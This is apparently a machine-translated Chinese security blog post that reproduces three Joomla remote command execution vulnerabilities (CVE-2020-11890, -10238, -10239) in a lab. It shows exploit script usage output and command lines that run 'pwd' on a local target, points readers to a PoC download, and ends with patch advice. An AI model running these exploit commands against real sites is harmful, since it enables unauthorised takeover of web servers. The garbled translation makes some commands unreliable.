JoomlaRCE remote code execution
Cve-2020-11890 <3.9.17 Remote Command Execution Vulnerability CVE-2020-10238 <= 3.9.15 Remote Command Execution Vulnerability CVE-2020-10239 3.7.0 to 3.9.15 Remote Command execution VulnerabilityCopy the codeIi. Details of vulnerabilities:
Joomla! Is an Open Source, cross-platform content management system (CMS) developed by the Open Source Matters team using PHP and MySQL.
This vulnerability number has been assigned and details will be updated soon.
Affected version:
CVE-2020-11890 <3.9.17
CVE-2020-10238 <= 3.9.15
CVE-2020-10239 3.7.0 to 3.9.15
Copy the codeIii. Experimental Recurrence Environment:
Downloads.joomla.org/cms/joomla3…
Downloads.joomla.org/cms/joomla3…
or
Background reply “Joomla2020” obtain the environment and POC
Installation environment process:
Filling in configuration Information
Database information
Profile information
The installation is complete
A successful login
Environment Installation succeeded
4. Vulnerability recurrence verification
1. Vulnerability verification
CVE-2020-11890
Example script parameters:
➜ thelostworld Qualify Python2 CVE-2020-11890.py -h Usage: CVE-2020-11890.py [-h] -url URL -u USERNAME -p PASSWORD [-usuper USERNAMESUPER] [-psuper PASSWORDSUPER] [-esuper EMAILSUPER] [-cmd COMMAND] optional arguments: -h, --help show this help message and exit -url URL, --url URL URL for your Joomla target -u USERNAME, --username USERNAME username -p PASSWORD, --password PASSWORD password -usuper USERNAMESUPER, --usernamesuper USERNAMESUPER Super's username -psuper PASSWORDSUPER, --passwordsuper PASSWORDSUPER Super's password -esuper EMAILSUPER, --emailsuper EMAILSUPER Super's Email -cmd COMMAND, --command COMMAND commandCopy the codeCommand executed successfully
Python2 cve202011890. Py - url http://192.168.0.102:8080 - u thelostworld -p thelostworld -cmd PWDCopy the code
2. Vulnerability verification
CVE-2020-10238
Example script parameters:
➜ thelostworld Qualify Python2 RCE.py -h Usage: RCE.py [-h] -url URL -u USERNAME -p PASSWORD [-cmd COMMAND] optional arguments: -h, --help show this help message and exit -url URL, --url URL URL for your Joomla target -u USERNAME, --username USERNAME username -p PASSWORD, --password PASSWORD password -cmd COMMAND, --command COMMAND commandCopy the codeExecute successfully
Python2 RCE. Py - url http://192.168.0.102:8080 - u thelostworld -p thelostworld -cmd PWDCopy the code
2. Vulnerability verification
CVE-2020-10239
Example script parameters:
➜ thelostworld Qualify Python2 CVE202010239. py -h Usage: cve202010239.py [-h] -url URL -u USERNAME -p PASSWORD [-cmd COMMAND] optional arguments: -h, --help show this help message and exit -url URL, --url URL URL for your Joomla target -u USERNAME, --username USERNAME username -p PASSWORD, --password PASSWORD password -cmd COMMAND, --command COMMAND commandCopy the codeExecute successfully
Python2 cve202010239. Py - url http://192.168.0.102:8080 - u thelostworld -p thelostworld -cmd PWDCopy the code
Vi. Vulnerability repair:
Official website to download the latest version and team patches:
Downloads.joomla.org/
Reference links:
www.secfree.com/vul-141066….
wiki.0-sec.org/?q=joomla
Background reply “Joomla2020” obtain the environment and POC
Disclaimer: This site provides safety tools, procedures (methods) may be offensive, only for safety research and teaching, risk!
Subscribe for more revisited articles and study notes
thelostworld
Safe road, side by side with you !!!!
Personal knowledge: www.zhihu.com/people/fu-w…
Brief personal book: www.jianshu.com/u/bf0e38a8d…